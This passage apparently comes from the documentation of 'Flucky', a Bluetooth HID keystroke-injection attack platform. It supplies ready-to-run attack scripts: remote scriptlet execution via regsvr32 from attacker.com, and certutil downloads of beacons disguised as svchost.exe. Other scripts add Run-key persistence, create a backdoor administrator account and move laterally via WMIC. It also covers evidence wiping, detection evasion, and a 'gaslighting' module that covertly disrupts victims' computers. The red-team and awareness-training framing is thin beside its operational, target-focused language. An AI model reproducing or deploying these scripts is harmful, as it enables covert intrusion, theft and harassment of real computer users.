# System information gathering
LOLBAS_WMIC computersystem get name,username,domain,totalphysicalmemory

LOLBAS_REGSVR32 <param>

Description: Execute scripts via regsvr32.exe
Usage: LOLBAS_REGSVR32 /s /n /u /i:http://example.com/script.sct scrobj.dll
Technique: Squiblydoo attack variant

• Executes remote scripts
• Bypasses application control
• Appears as legitimate system activity

Script Execution:

# Execute remote scriptlet
LOLBAS_REGSVR32 /s /n /u /i:http://attacker.com/payload.sct scrobj.dll

# Local scriptlet execution
LOLBAS_REGSVR32 /s /u /i:payload.sct scrobj.dll

LOLBAS_WSCRIPT <param>

Description: Execute VBScript/JScript via wscript.exe
Usage: LOLBAS_WSCRIPT //e:vbscript C:\\script.vbs
Use Cases:

• Legacy script execution
• COM object manipulation
• File system operations

Script Examples:

# Execute VBScript file
LOLBAS_WSCRIPT //e:vbscript C:\\payload.vbs

# Execute JScript
LOLBAS_WSCRIPT //e:jscript C:\\payload.js

🧠 Gaslighting - Psychological Operations

The Art of Psychological Influence

Gaslighting transforms Flucky from a technical tool into a psychological weapon. Make users question their reality, test security awareness, and create realistic training scenarios.

Individual Gaslighting Commands

GASLIGHT_TYPO

Description: Introduce realistic typing errors
Usage: GASLIGHT_TYPO
Effect: Types "teh" then corrects to "the"

• Appears as natural human error
• Creates minor frustration
• Tests user attention to detail

GASLIGHT_CAPS_TOGGLE <min> <max>

Description: Randomly toggle Caps Lock
Usage: GASLIGHT_CAPS_TOGGLE 30000 120000
Parameters:

• <min>: Minimum delay in milliseconds (e.g., 30000 = 30 seconds)
• <max>: Maximum delay in milliseconds (e.g., 120000 = 2 minutes)

Psychological Impact:

• Creates confusion about keyboard state
• Mimics hardware "glitches"
• Tests user technical awareness

GASLIGHT_FOCUS_STEAL <min> <max>

Description: Randomly switch application focus
Usage: GASLIGHT_FOCUS_STEAL 45000 180000
Effect: ALT+TAB to switch windows randomly

Operational Use:

• Disrupts concentration during critical tasks
• Tests user multitasking ability
• Creates "system instability" perception

GASLIGHT_NOTIFICATION <min> <max>

Description: Trigger system notification center
Usage: GASLIGHT_NOTIFICATION 60000 240000
Effect: Briefly opens notification panel then closes

Psychological Effect:

• Creates distraction from current work
• Mimics system notification behavior
• Tests user response to interruptions

GASLIGHT_MEDIA_PAUSE <min> <max>

Description: Randomly pause media playback
Usage: GASLIGHT_MEDIA_PAUSE 90000 300000
Impact: Affects music, videos, presentations

Use Cases:

• Disrupts background media during work
• Creates confusion about media player behavior
• Excellent for awareness training scenarios

GASLIGHT_VOLUME_JITTER <min> <max>

Description: Random small volume adjustments
Usage: GASLIGHT_VOLUME_JITTER 120000 480000
Effect: 1-3 volume steps up or down randomly

Subtle Influence:

• Barely noticeable volume changes
• Creates subliminal discomfort
• Tests audio awareness

GASLIGHT_WIGGLE <min> <max>

Description: Simulate cursor movement
Usage: GASLIGHT_WIGGLE 150000 600000
Effect: Types space then backspace rapidly

Psychological Impact:

• Creates "ghost typing" sensation
• Mimics touchpad or mouse issues
• Tests user observation skills

GASLIGHT_MINIMIZE <min> <max>

Description: Randomly minimize windows
Usage: GASLIGHT_MINIMIZE 180000 720000
Effect: Minimizes current active window

Disruption Level:

• High visibility "glitch"
• Significant work disruption
• Tests user patience and problem-solving

GASLIGHT_RUN_COMMAND <min> <max>

Description: Briefly flash Run dialog
Usage: GASLIGHT_RUN_COMMAND 240000 900000
Effect: Opens then immediately closes Run dialog

Security Testing:

• Tests if users notice security-related dialogs
• Creates "system probing" suspicion
• Excellent for security awareness metrics

Gaslighting Profile System

Complete Behavioral Profiles

GASLIGHT_PROFILE_START Description: Begin gaslighting profile definition
Usage: GASLIGHT_PROFILE_START

GASLIGHT_PROFILE_END Description: Save and activate gaslighting profile
Usage: GASLIGHT_PROFILE_END

GASLIGHT_STOP Description: Stop all gaslighting activities
Usage: GASLIGHT_STOP

Complete Gaslighting Scenarios

Corporate Security Awareness Training:

GASLIGHT_PROFILE_START
GASLIGHT_TYPO
GASLIGHT_CAPS_TOGGLE 30000 120000
GASLIGHT_FOCUS_STEAL 45000 180000
GASLIGHT_NOTIFICATION 60000 240000
GASLIGHT_MEDIA_PAUSE 90000 300000
GASLIGHT_VOLUME_JITTER 120000 480000
GASLIGHT_WIGGLE 150000 600000
GASLIGHT_MINIMIZE 180000 720000
GASLIGHT_RUN_COMMAND 240000 900000
GASLIGHT_PROFILE_END

Subtle Psychological Influence:

GASLIGHT_PROFILE_START
GASLIGHT_TYPO
GASLIGHT_CAPS_TOGGLE 60000 300000  # Less frequent
GASLIGHT_VOLUME_JITTER 300000 900000  # Very subtle
GASLIGHT_PROFILE_END

Aggressive System Testing:

GASLIGHT_PROFILE_START
GASLIGHT_FOCUS_STEAL 15000 60000    # Frequent
GASLIGHT_MINIMIZE 30000 120000      # Often
GASLIGHT_MEDIA_PAUSE 45000 180000   # Regular
GASLIGHT_PROFILE_END

🎯 Real-World Operational Scenarios

Scenario 1: Corporate Red Team Assessment

Objective: Gain persistent access and assess detection capabilities

# Phase 1: Initial foothold
SET_XOR_KEY CorpRedTeam2024!
STEALTH_ON

BUTTON_DEF
DELAY 3000
WIN r
STRING powershell -WindowStyle Hidden -ExecutionPolicy Bypass -Command "Start-Process cmd -WindowStyle Hidden"
ENTER
DELAY 2000
STRING whoami /groups > C:\\Windows\\Temp\\privs.txt
ENTER
DELAY 1000
STRING net user %username% > C:\\Windows\\Temp\\userinfo.txt
ENTER
DELAY 1000
STRING ipconfig /all > C:\\Windows\\Temp\\network.txt
ENTER
END_BUTTON

# Phase 2: Persistence establishment  
BUTTON2_DEF
DELAY 2000
LOLBAS_REG add "HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run" /v "WindowsUpdate" /t REG_SZ /d "C:\\Windows\\System32\\notepad.exe"
ENTER
DELAY 1000
LOLBAS_CERTUTIL -urlcache -split -f http://internal-server/tools/beacon.exe C:\\Windows\\Temp\\svchost.exe
ENTER
END_BUTTON2

# Phase 3: Gaslighting for awareness testing
GASLIGHT_PROFILE_START
GASLIGHT_TYPO
GASLIGHT_RUN_COMMAND 120000 300000
GASLIGHT_NOTIFICATION 180000 420000
GASLIGHT_PROFILE_END

SELF_DESTRUCT 3

Scenario 2: Physical Security Assessment

Objective: Test physical security controls and response procedures

# Covert intelligence gathering
SET_XXOR_KEY PhysicalSecTest
STEALTH_ON
DISABLE_BUTTON  # Safe transport

BUTTON_DEF
DELAY 5000  # Allow for device placement
STEALTH_OFF  # Brief visibility for testing
STRING Physical Security Test in Progress
ENTER
DELAY 2000
STRING If found, please contact security team
ENTER
DELAY 1000
STEALTH_ON
STRING Gathering system information...
ENTER
DELAY 2000
LOLBAS_CMD "systeminfo | findstr /B /C:\"Host Name\" /C:\"Domain\""
ENTER
DELAY 3000
LOLBAS_WMIC computersystem get name,username,domain
ENTER
END_BUTTON

# Emergency cleanup script
HIDE_EGG "STRING Removing test artifacts...; ENTER; DELAY 1000; LOLBAS_REG delete \"HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\" /v \"WindowsUpdate\" /f; ENTER; STRING Cleanup complete; ENTER"

ENABLE_BUTTON

Scenario 3: Security Awareness Training

Objective: Train users to recognize subtle attack indicators

# Visible training mode
STEALTH_OFF

BUTTON_DEF
STRING SECURITY AWARENESS TRAINING
ENTER
DELAY 2000
STRING This is a simulated security test
ENTER
DELAY 2000
STRING Watch for unusual system behavior
ENTER
DELAY 3000
STRING Training session active for next 30 minutes
ENTER
END_BUTTON

# Subtle gaslighting profile
GASLIGHT_PROFILE_START
GASLIGHT_TYPO
GASLIGHT_CAPS_TOGGLE 60000 180000
GASLIGHT_FOCUS_STEAL 120000 300000
GASLIGHT_NOTIFICATION 180000 420000
GASLIGHT_PROFILE_END

# Chaos mode for unpredictable training
CHAOS_ON
BUTTON2_DEF
STRING Did you notice this activity?
ENTER
DELAY 2000
STRING Report suspicious behavior to IT
ENTER
END_BUTTON2

Scenario 4: Incident Response Drill

Objective: Test IR team capabilities with realistic attack simulation

# Multi-phase attack simulation
SET_XOR_KEY IRDrill2024

# Phase 1: Initial detection triggers
BUTTON_DEF
DELAY 10000  # Allow IR team to get situated
STRING [SIMULATION] Stage 1: Initial Compromise Detected
ENTER
DELAY 3000
LOLBAS_CMD "net user attacker P@ssw0rd! /add && net localgroup administrators attacker /add"
ENTER
DELAY 5000
STRING [SIMULATION] Stage 2: Privilege Escalation Successful
ENTER
END_BUTTON

# Phase 2: Persistence and lateral movement
BUTTON2_DEF
DELAY 15000  # Mid-drill activation
STRING [SIMULATION] Stage 3: Lateral Movement Detected
ENTER
DELAY 2000
LOLBAS_WMIC /node:192.168.1.50 process call create "cmd.exe /c whoami"
ENTER
DELAY 5000
STRING [SIMULATION] Stage 4: Data Exfiltration Attempt
ENTER
DELAY 2000
LOLBAS_CERTUTIL -encode C:\\important.docx C:\\encoded.txt
ENTER
END_BUTTON2

SCHEDULE 300000 "STRING [SIMULATION] Stage 5: Drill Complete - Please Debrief"

🔧 Advanced Operational Security

Transport and Deployment Procedures

Safe Transport Configuration:

DISABLE_BUTTON
STEALTH_ON
SET_XOR_KEY MissionSpecificKey
# Device is now safe for physical transport
# No risk of accidental activation
# All scripts encrypted

Rapid Deployment:

ENABLE_BUTTON
STEALTH_OFF  # Optional - based on opsec requirements
STATUS  # Verify system ready
# Device operational in under 10 seconds

Mission Planning Templates

Quick Reconnaissance:

BUTTON_DEF
DELAY 3000
STRING Quick System Assessment
ENTER
DELAY 1000
LOLBAS_CMD "whoami && hostname && systeminfo | findstr /B /C:\"OS Name\""
ENTER
DELAY 2000
LOLBAS_CMD "ipconfig && netstat -ano | findstr :443"
ENTER
END_BUTTON

Persistence Establishment:

BUTTON_DEF
DELAY 2000
LOLBAS_REG add "HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run" /v "UpdateService" /t REG_SZ /d "C:\\Windows\\System32\\notepad.exe"
ENTER
DELAY 1000
LOLBAS_CERTUTIL -urlcache -split -f http://server/payload.exe C:\\Users\\Public\\payload.exe
ENTER
END_BUTTON

Evidence Cleanup:

BUTTON_DEF
STRING Removing operational artifacts...
ENTER
DELAY 1000
LOLBAS_CMD "del C:\\Windows\\Temp\\*.txt /q && del C:\\Users\\Public\\payload.exe /q"
ENTER
DELAY 1000
LOLBAS_REG delete "HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run" /v "UpdateService" /f
ENTER
DELAY 1000
LOLBAS_CIPHER /w:C:\\temp
ENTER
END_BUTTON

🎯 Best Practices & Operational Guidelines

Operational Security

1. Always set XOR keys for mission-specific encryption
2. Use STEALTH_ON for real operations, STEALTH_OFF for testing
3. Configure SELF_DESTRUCT based on mission parameters
4. Test all scripts in controlled environment first
5. Have cleanup procedures ready via easter eggs or secondary scripts

Script Development

1. Include realistic delays for system response times
2. Use LOLBAS instead of external tools when possible
3. Implement error handling through multiple execution paths
4. Test on target OS versions before deployment
5. Keep scripts modular for easy modification

Training and Assessment

1. Start subtle with gaslighting - increase intensity based on response
2. Use chaos mode for stress testing and awareness training
3. Schedule payloads to test monitoring and response capabilities
4. Implement gaslighting profiles that match assessment objectives
5. Always debrief after training exercises

🚀 The Future of HID Attacks

Flucky represents the evolution of HID attack tools - moving beyond simple keystroke injection into the realms of:

• Psychological Operations - Influencing user behavior and awareness
• Fileless Execution - Living off the land without leaving traces
• Behavioral Evasion - Mimicking human patterns to avoid detection
• Wireless Covertness - Bluetooth-based, physically detached operation

Why This Matters

Traditional HID tools are becoming increasingly detectable. EDR solutions, behavioral analysis, and user awareness are making old techniques obsolete. Flucky addresses these challenges through:

• Adaptation - Morphing payloads and unpredictable timing
• Integration - Using built-in system tools rather than external malware
• Psychology - Testing and influencing human factors, not just technical controls
• Stealth - Multiple layers of operational security

🔮 Join the Evolution

Flucky isn't just a tool - it's a new approach to red team operations, security testing, and awareness training. By embracing these advanced techniques, you're not just running payloads - you're conducting sophisticated security assessments that reflect real-world attack methodologies.

The era of basic script execution is over. Welcome to the future of HID operations.

---

🦆 Flucky - Because Your Tools Should Be as Sophisticated as Your Skills

⭐ If Flucky has transformed your approach to red teaming, give this project a star! ⭐

🔧 Contributions, feature requests, and real-world use cases welcome!

"In a world of basic duckies, be a Flucky"

---

🦆 Flucky - Advanced Bluetooth HID Attack Platform

Part 4: Essential Reference, Troubleshooting & Community

The Missing Pieces - From Quick Reference to Advanced Support

"Great tools deserve great documentation. Here's everything else you need."

📋 Complete Command Reference Table

Quick Command Lookup

Category	Command	Parameters	Description
Basic Keys	ENTER	None	Press Enter key
	SPACE	None	Press Space bar
	TAB	None	Press Tab key
	ESC/ESCAPE	None	Press Escape key
	BREAK/PAUSE	None	Press Break/Pause key
Navigation	UPARROW/DOWNARROW	None	Press arrow keys
	LEFTARROW/RIGHTARROW	None	Press arrow keys
	HOME/END	None	Press Home/End keys
	PAGEUP/PAGEDOWN	None	Press Page Up/Down
Modifiers	WIN/META	None	Press Windows key
	WIN <key>	Single char	Windows + key combo
	CTRL <key>	Single char	Control + key combo
	ALT <key>	Single char	Alt + key combo
	SHIFT <key>	Single char	Shift + key combo
	CTRL ALT DELETE	None	Three-key combo
Function Keys	F1-F12	None	Press function keys
Media Keys	VOLUMEUP/VOLUMEDOWN	None	Volume control
	MUTE	None	Toggle audio mute
	PLAY/PAUSE	None	Media play/pause
	NEXTTRACK/PREVTRACK	None	Track control
String Input	STRING <text>	Any text	Type text string
	<character>	Single char	Press single key
Script Management	script	None	Enter script mode
	BUTTON_DEF	None	Define button script
	BUTTON2_DEF	None	Define button2 script
Timing	DELAY <ms>	Milliseconds	Insert delay
	DEFAULTDELAY <ms>	Milliseconds	Set default delay
Bluetooth	DISCONNECT	None	Terminate BLE
	RECONNECT	None	Reinitialize BLE
Stealth	STEALTH_ON/OFF	None	Toggle stealth mode
Encryption	SET_XOR_KEY <key>	Encryption key	Set XOR key
Obfuscation	OBFUSCATE_ON/OFF	None	Basic obfuscation
	ADV_OBFUSCATE_ON/OFF	None	Advanced obfuscation
Jitter	SET_JITTER <ms>	Max jitter ms	Set jitter range
	JITTER_ON/OFF	None	Toggle jitter
Payload Management	REPEAT <n>	Count	Repeat last command
	MORPH_PAYLOAD	None	Randomize script
Easter Eggs	HIDE_EGG <script>	Script content	Store hidden payload
	ACTIVATE_EGG	None	Execute hidden payload
Self-Destruct	SELF_DESTRUCT <n>	Count	Erase after N runs
Scheduling	SCHEDULE <ms> <script>	Time + script	Schedule payload
	RUN_SCHEDULE	None	Execute scheduled
Chaos Mode	CHAOS_ON/OFF	None	Random execution
LOLBAS	LOLBAS_CIPHER <param>	Parameters	cipher.exe execution
	LOLBAS_CMD <param>	Parameters	cmd.exe execution
	LOLBAS_CMDKEY <param>	Parameters	cmdkey.exe execution
	LOLBAS_CERTUTIL <param>	Parameters	certutil.exe execution
	LOLBAS_REG <param>	Parameters	reg.exe execution
	LOLBAS_WMIC <param>	Parameters	wmic.exe execution
	LOLBAS_REGSVR32 <param>	Parameters	regsvr32.exe execution
	LOLBAS_WSCRIPT <param>	Parameters	wscript.exe execution
Gaslighting	GASLIGHT_TYPO	None	Introduce typos
	GASLIGHT_CAPS_TOGGLE <min> <max>	Min/max ms	Random Caps Lock
	GASLIGHT_FOCUS_STEAL <min> <max>	Min/max ms	Switch windows
	GASLIGHT_NOTIFICATION <min> <max>	Min/max ms	Trigger notifications
	GASLIGHT_MEDIA_PAUSE <min> <max>	Min/max ms	Pause media
	GASLIGHT_VOLUME_JITTER <min> <max>	Min/max ms	Adjust volume
	GASLIGHT_WIGGLE <min> <max>	Min/max ms	Cursor wiggle
	GASLIGHT_MINIMIZE <min> <max>	Min/max ms	Minimize windows
	GASLIGHT_RUN_COMMAND <min> <max>	Min/max ms	Flash Run dialog
	GASLIGHT_PROFILE_START/END	None	Profile management
	GASLIGHT_STOP	None	Stop gaslighting
System	STATUS	None	Show system status
	rename <name>	New name	Change device name
	clear	None	Clear screen
	help	None	Show help
	ENABLE_BUTTON/DISABLE_BUTTON	None	Button control

Total Documented Commands: 73 individual commands ✅

🚨 Troubleshooting & Error Guide

Common Issues and Solutions

Bluetooth Connectivity Problems

Issue: "Error: Bluetooth not connected"

# Symptoms:
# - STATUS shows "Bluetooth: Disconnected"
# - Commands fail with Bluetooth error

# Solutions:
1. RECONNECT  # Force reconnection
2. Check target device Bluetooth settings
3. Ensure ESP32 is in range (typically 10m)
4. Verify no other HID devices are blocking
5. DISCONNECT then RECONNECT for hard reset

Issue: Device not appearing in Bluetooth list

# Solutions:
1. STATUS  # Verify BLE is running
2. rename "Legitimate Keyboard"  # Use convincing name
3. Check ESP32 power supply (stable 3.3V needed)
4. Verify firmware flashed correctly
5. Monitor serial for BLE initialization errors

Script Execution Issues

Issue: "Error: Invalid command length"

# Cause: Command exceeds 256 character limit
# Fix: Split long commands or use script mode

# Bad:
STRING This is a very long command that exceeds the maximum allowed character limit and will fail to execute properly because it's too damn long

# Good:
STRING This is part one of a long command
DELAY 100
STRING This is part two of the same long command

Issue: "Error: Script too long"

# Cause: Script exceeds 4096 character limit
# Fix: Optimize script or use multiple button scripts

# Optimization techniques:
1. Remove unnecessary DELAY commands
2. Use shorter STRING content
3. Combine multiple commands on one line with ;
4. Use LOLBAS instead of lengthy manual steps

Issue: "Error: STRING requires text to type"

# Cause: Empty STRING command
# Fix: Ensure STRING has content

# Bad:
STRING
# Good:
STRING Hello World

Hardware Issues

Issue: Buttons not responding

# Check:
1. ENABLE_BUTTON  # Verify buttons are enabled
2. Check physical wiring (GPIO 0 and GPIO 2)
3. Verify INPUT_PULLUP configuration
4. Test with simple command: STRING Test

Issue: LED not working

# Check:
1. STEALTH_OFF  # Ensure stealth mode is disabled
2. Verify GPIO 22 connection
3. Check LED polarity
4. Test with: STEALTH_ON then STEALTH_OFF

Performance Issues

Issue: Commands executing too slowly

# Optimization:
1. DEFAULTDELAY 0  # Remove default delays
2. JITTER_OFF  # Disable random delays
3. OBFUSCATE_OFF  # Disable obfuscation
4. ADV_OBFUSCATE_OFF  # Disable advanced obfuscation

Issue: Random freezes or crashes

# Stability measures:
1. Reduce script complexity
2. Add strategic DELAY commands
3. Avoid memory-intensive operations
4. Ensure stable power supply

Error Code Reference

Error Message	Cause	Solution
Bluetooth not initialized	BLE not started	Use RECONNECT
Bluetooth not connected	No active connection	Check target device
Invalid command length	Command too long	Split into parts
STRING requires text	Empty string	Add content
Unknown command	Typo or invalid command	Check help
Script too long	>4096 characters	Optimize script
Button script buffer overflow	Script too large during definition	Use smaller script

🔧 Advanced Configuration Guide

Memory Management

Buffer Sizes and Limits:

# Current configuration (from source code):
- Command buffer: 256 characters
- Script storage: 4096 characters
- Command history: 10 entries
- Gaslight profile: 50 lines max
- Serial buffer: 1024 bytes

Optimization Tips:

# For memory-constrained operations:
1. Use shorter string literals
2. Reuse commands with REPEAT
3. Store complex scripts as button scripts
4. Use LOLBAS instead of long manual sequences

Power Management

Battery Operation:

# Extend battery life:
STEALTH_ON        # Disable LED
DISABLE_BUTTON    # Prevent accidental activation
DELAY 1000        # Add delays to reduce duty cycle
# Typical consumption: 40-80mA during operation

USB Power Considerations:

# Ensure stable USB power:
- Use quality USB cables
- Avoid USB hubs if possible
- Test with different power sources
- Monitor for voltage drops during transmission

🎯 Advanced Usage Patterns

Multi-Stage Attack Chains

Phase-Based Execution:

# Stage 1: Reconnaissance
BUTTON_DEF
DELAY 3000
LOLBAS_CMD "systeminfo && whoami /all"
ENTER
DELAY 2000
STRING Phase 1 Complete - Reconnaissance
ENTER
END_BUTTON

# Stage 2: Privilege Escalation  
BUTTON2_DEF
DELAY 3000
LOLBAS_REG query "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run"
ENTER
DELAY 2000
STRING Phase 2 Complete - Privilege Assessment
ENTER
END_BUTTON2

# Stage 3: Persistence (Easter Egg)
HIDE_EGG "STRING Phase 3: Establishing Persistence; ENTER; DELAY 1000; LOLBAS_REG add \"HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\" /v \"UpdateService\" /t REG_SZ /d \"C:\\Windows\\System32\\notepad.exe\"; ENTER"

Conditional Execution Patterns

Time-Based Activation:

# Execute different scripts based on time
SCHEDULE 30000 "STRING Morning Reconnaissance; ENTER"
SCHEDULE 720000 "STRING Afternoon Check; ENTER" 
SCHEDULE 1440000 "STRING Evening Cleanup; ENTER"

Behavior-Adaptive Scripts:

# Use chaos mode for unpredictable execution
CHAOS_ON
BUTTON_DEF
STRING Unpredictable Security Test
ENTER
# Different execution each time based on random timing
END_BUTTON

🔒 Security Best Practices

Operational Security

Pre-Deployment Checklist:

1. SET_XOR_KEY MissionSpecificKey
2. STEALTH_ON
3. DISABLE_BUTTON  # For transport
4. Verify all scripts encrypted
5. Test in isolated environment first

Post-Operation Procedures:

1. ACTIVATE_EGG  # If cleanup script defined
2. MORPH_PAYLOAD  # Change script signatures
3. SET_XOR_KEY NewKey  # Change encryption
4. SELF_DESTRUCT 1  # One-time use if needed

Detection Avoidance

Behavioral Evasion:

# Make execution look human:
ADV_OBFUSCATE_ON
SET_JITTER 500
JITTER_ON
DEFAULTDELAY 100
# Adds randomness to timing and keystrokes

Signature Evasion:

# Change command signatures:
MORPH_PAYLOAD  # Randomize script order
SET_XOR_KEY  # Encrypt stored scripts
Use LOLBAS  # Avoid external tool signatures

🌟 Community & Contribution

How to Contribute

Feature Requests:

• Submit detailed use cases
• Explain the operational need
• Suggest implementation approach

Bug Reports:

• Describe the exact issue
• Provide reproduction steps
• Include hardware/software environment

Code Contributions:

• Follow existing code style
• Add comprehensive comments
• Test thoroughly before submitting

Success Stories Wanted!

Share Your Flucky Experiences:

• Real-world red team successes
• Creative use cases
• Custom modifications
• Training scenario ideas

📚 Learning Resources

Next Steps After Mastering Basics

1. Study LOLBAS Techniques - Master living-off-the-land
2. Learn Behavioral Analysis - Understand detection mechanisms
3. Practice OPSEC - Operational security in real environments
4. Explore Bluetooth Security - Understand the underlying technology

Related Tools to Explore

• WiFi Duck - Complementary WiFi-based HID tool
• P4wnP1 - Advanced USB attack platform
• Flipper Zero - Multi-tool for RF and physical security

🎊 Final Words

The Flucky Philosophy

Flucky represents a shift in HID attack tools - from simple script execution to sophisticated operational platforms. It's not just about what commands you can run, but:

• How stealthily you can run them
• How creatively you can use built-in tools
• How psychologically you can influence targets
• How securely you can operate

Your Journey Ahead

You now have one of the most advanced Bluetooth HID tools available. But remember:

The tool is only as effective as the operator using it.

Continue learning, practicing, and thinking creatively about how to apply these capabilities in your security work.

---

🦆 Welcome to the Future of HID Operations

⭐ If Flucky has become your go-to tool, give it a star and share your experiences!

🐛 Found an issue? Have an idea? Contribute to make it better!

🚀 The journey doesn't end here - it's just beginning.

"In the hands of a skilled operator, Flucky isn't a tool - it's a force multiplier."